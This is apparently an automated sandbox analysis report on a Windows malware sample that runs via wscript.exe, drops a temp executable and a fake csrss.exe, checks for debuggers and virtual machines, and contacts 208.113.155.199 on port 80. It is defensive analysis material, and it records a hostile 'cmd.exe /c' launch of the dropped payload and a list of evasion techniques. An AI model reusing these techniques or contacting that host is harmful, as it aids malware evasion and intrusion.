Source: wscript.exe, 00000000.00000002.6551851241.00000000054A0000.00000002.sdmp, radE040D.tmp, 00000004.00000002.7951852941.00000000035A0000.00000002.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: csrss.exe, 00000008.00000002.6848650618.0000000002C12000.00000004.sdmpBinary or memory string: amd64_hyperv-vmserial.resources_31bf3856ad364e35_10.0.17134.1_en-us_6d3c997783423a80\amd64_hyperv-vmemulateddevices_31bf3856ad364e35_10.0.17134.81_none_a622801bed1b811f\amd64_hyperv-vmiccore.resources_31bf3856ad364e35_10.0.17134.1_en-us_b801a316901bad5b\amd64_ipmidrv.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_2d93a60324c5d86c\5b86camd64_intelpep.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_b919ba664eb8a174\bamd64_keyboard.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_14295de0d5889a92\amd64_hyperv-vmsynthnic.resources_31bf3856ad364e35_10.0.17134.1_en-us_32a65f534e80b7d2\amd64_microsoft-windows-cmisetup_31bf3856ad364e35_10.0.17134.112_none_fc7bc47aae4d520f\amd64_ialpssi_i2c.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_0a046d4df7f0ac7b\amd64_hyperv-vpci-rootporterr_31bf3856ad364e35_10.0.17134.1_none_4b48602cec1be5d9\b86camd64_ipoib6x.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_e59925927d88680e\444amd64_ialpssi_gpio.inf.resources_31bf3856ad364e35_10.0.17134.1_en-us_a649fe25b1990444\amd64
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat\*`
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catK
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.14.1tX
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_3c5b1e1b1b3e66b3.manifestL
Source: radE040D.tmp, 00000004.00000003.7168918444.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-p..ru-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_d16dce7672841ddd.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804\
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.17134.48_none_28a3bf323de300ba.manifest
Source: radE040D.tmp, 00000004.00000003.7165507190.00000000030F8000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.mum\
Source: radE040D.tmp, 00000004.00000003.7127160132.000000000310D000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catatW
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat.mumC|
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.17134.1_none_69e85823c476b806.manifest&
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.17134.165_none_11e6025cbba84064.manifestt
Source: radE040D.tmp, 00000004.00000003.7168740992.0000000003103000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1bR
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.17134.1_none_7743eea1a413bb8c.manifest
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vhd-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_0b749ee450213385\
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_8051bd2040ebffa9\U
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-rdv_31bf3856ad364e35_10.0.17134.1_none_6054528c8a07dd45\.
Source: radE040D.tmp, 00000004.00000003.7106645105.000000000387B000.00000004.sdmpBinary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.Format.ps1xmlps1xml.cdxml
Source: radE040D.tmp, 00000004.00000003.7129876000.00000000040CD000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catc
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.17134.1_en-us_9c1fa24ea8808bce.manifest
Source: radE040D.tmp, 00000004.00000003.7130819819.000000000316B000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7106645105.000000000387B000.00000004.sdmpBinary or memory string: \\?\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\*ction.psd1cdxmldxml.cdxmlgM
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catcatt
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum11D
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.17134.1_none_84e0eedae46f7b9b.manifestfest
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.6912097627.000000000386C000.00000004.sdmpBinary or memory string: $$_syswow64_windowspowershell_v1.0_modules_hyper-v_1.1_274139982b49eac9.cdf-ms
Source: radE040D.tmp, 00000004.00000003.7168254013.0000000003127000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: csrss.exe, 00000008.00000002.6858640583.00000000038C2000.00000004.sdmpBinary or memory string: Hyper-V.FormatTestDtc.psm1
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-licensing_31bf3856ad364e35_10.0.17134.1_none_369c533be4c3e496.manifest
Source: radE040D.tmp, 00000004.00000003.7130819819.000000000316B000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..failoverreplication_31bf3856ad364e35_10.0.17134.1_none_80458ecfde93ef21\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.17134.1_none_6efae9ae437759d8\b3e\
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.muml
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-tpm_31bf3856ad364e35_10.0.17134.1_none_604b83348a0c5e92.manifestM
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.17134.1_en-us_a86f4344ed926804.manifest
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.catE
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.17134.112_none_17084bffb5c5c964.manifest
Source: radE040D.tmp, 00000004.00000003.7131372553.00000000030F5000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.17134.1_none_8ce33edadf477e7a.manifestestd
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1+
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-drivers-hypervisor-bcd_31bf3856ad364e35_10.0.17134.1_none_fb42759451b23f2f.manifest
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.17134.1_en-us_02a473bf02f2a824.manifest=
Source: radE040D.tmp, 00000004.00000003.7169348027.00000000031DC000.00000004.sdmpBinary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004\
Source: radE040D.tmp, 00000004.00000003.6832603675.0000000003A84000.00000004.sdmpBinary or memory string: amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.17134.1_none_e636218254eba71f.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.1_none_bb0455987cc9b004\5\
Source: radE040D.tmp, 00000004.00000003.7131128591.000000000316C000.00000004.sdmpBinary or memory string: t-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..-onecore-deployment_31bf3856ad364e35_10.0.17134.1_none_31bb998e7ce8dbdd.manifest>
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-firewallrules_31bf3856ad364e35_10.0.17134.1_none_b9673992b104448b.manifestqU
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-socket-provider_31bf3856ad364e35_10.0.17134.81_none_0a34114fff806d3f.manifest
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-3dvideo_31bf3856ad364e35_10.0.17134.48_none_cf157924edc24a05\
Source: radE040D.tmp, 00000004.00000003.7051472321.000000000312B000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.17134.1_none_d80c4ce4e8fa0144\C
Source: radE040D.tmp, 00000004.00000003.6849156169.0000000003AFE000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-hypervisor-events_31bf3856ad364e35_10.0.17134.1_none_93bac8ae42b1f037.manifest
Source: radE040D.tmp, 00000004.00000003.7168322814.00000000030EE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1S
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-kmclr_31bf3856ad364e35_10.0.17134.1_none_b7de7159233ab503\\
Source: radE040D.tmp, 00000004.00000003.7168552748.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1H]
Source: radE040D.tmp, 00000004.00000003.6836607913.0000000003A40000.00000004.sdmpBinary or memory string: amd64_microsoft-hyper-v-h..t-service.resources_31bf3856ad364e35_10.0.17134.1_en-us_0d3e2a9bd4020545.manifest
Source: radE040D.tmp, 00000004.00000003.7127523278.00000000030F2000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat.cat
Source: radE040D.tmp, 00000004.00000003.7168781385.0000000003112000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-ClientEdition-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.mum
Source: radE040D.tmp, 00000004.00000003.7127160132.000000000310D000.00000004.sdmpBinary or memory string: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat*d8e`
Source: radE040D.tmp, 00000004.00000003.7168389496.0000000003169000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat
Source: radE040D.tmp, 00000004.00000003.7051561334.0000000003124000.00000004.sdmpBinary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-ram-parser.resources_31bf3856ad364e35_10.0.17134.1_en-us_8051bd2040ebffa9\ramparser.sys.muik
Source: radE040D.tmp, 00000004.00000003.7130185660.00000000030FE000.00000004.sdmpBinary or memory string: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.catat1
Program exit points
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | API call chain: ExitProcess graph end node | graph_4-49062
Queries a list of all running processes
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Process information queried: ProcessInformation

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\SysWOW64\wscript.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality for execution timing, often used to detect debuggersShow sources
Source: C:\ProgramData\Windows\csrss.exeCode function: 5_1_004195BA rdtsc 5_1_004195BA
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0054FAAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0054FAAD
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)Show sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_0041A13C LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetP4_2_0041A13C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_005664B0 TlsGetValue,TlsGetValue,TlsGetValue,TlsGetValue,CreateWaitableTimerA,SetWaitableTimer,WaitForMultipleObjects,CloseHandle,Sleep,CloseHandle,TlsGetValue,ResetEvent,__CxxThrowException@8,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree | 4_2_005664B0
Contains functionality to register its own exception handler
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00550F9A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 4_2_00550F9A
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0054FAAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 4_2_0054FAAD
Source: C:\ProgramData\Windows\csrss.exe | Code function: 5_1_0054FAAD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_1_0054FAAD
Source: C:\ProgramData\Windows\csrss.exe | Code function: 5_1_0054DB9A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 5_1_0054DB9A
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Memory protected: page no access | page read and write | page execute | page execute and write copy | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\wscript.exe | Network Connect: 208.113.155.199 80
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_004078E6 Wow64DisableWow64FsRedirection,GetForegroundWindow,ShellExecuteW,Wow64RevertWow64FsRedirection | 4_2_004078E6
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\radE040D.tmp C:\Users\CRAIGH~1\AppData\Local\Temp\radE040D.tmp
May try to detect the Windows Explorer process (often used for injection)
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmp | Binary or memory string: Program Manager
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmp | Binary or memory string: Progman
Source: radE040D.tmp, 00000004.00000002.7798508618.0000000000E10000.00000002.sdmp | Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: GetLocaleInfoA | 4_2_0055F513
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_00573480 cpuid | 4_2_00573480
Queries the volume information (name, serial number etc.) of a device
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_0054E1CE GetSystemTimeAsFileTime,__aulldiv | 4_2_0054E1CE
Contains functionality to query the account / user name
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmp | Code function: 4_2_004176EB _memset,GetUserNameW | 4_2_004176EB
Contains functionality to query the Windows version
Source: C:\Users\user\AppData\Local\Temp\radE040D.tmpCode function: 4_2_00449089 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,_memset,GetTickCount,GetTickCount,Heap32ListFirst,_memset,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,Process32Next,GetTickCount,GetTickCount,Thread32First,Thread32Next,GetTickCount,GetTickCount,Module32First,Module32Next,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_2_00449089
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language